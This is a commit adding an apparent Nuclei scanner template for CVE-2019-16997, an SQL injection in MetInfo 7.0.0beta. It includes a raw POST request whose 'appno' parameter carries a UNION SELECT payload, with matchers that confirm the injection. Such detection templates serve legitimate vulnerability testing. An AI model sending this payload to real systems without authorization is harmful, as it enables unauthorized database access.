Create CVE-2019-16997.yaml

patch-1
Ritik Chaddha 2022-04-15 11:33:55 +05:30 committed by GitHub
parent a8b68165e6
commit d70a0bda29
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: CVE-2019-16997
info:
name: Metinfo7.0.0beta SQLI
author: ritikchaddha
severity: high
description: SQL injection vulnerability discovered in MetInfo 7.0.0beta.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-16997
tags: metinfo,sqli
requests:
- raw:
- |
POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
appno= 1 union SELECT 98989*44313,1&editor=cn&site=web
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "4386499557"
- type: status
status:
- 200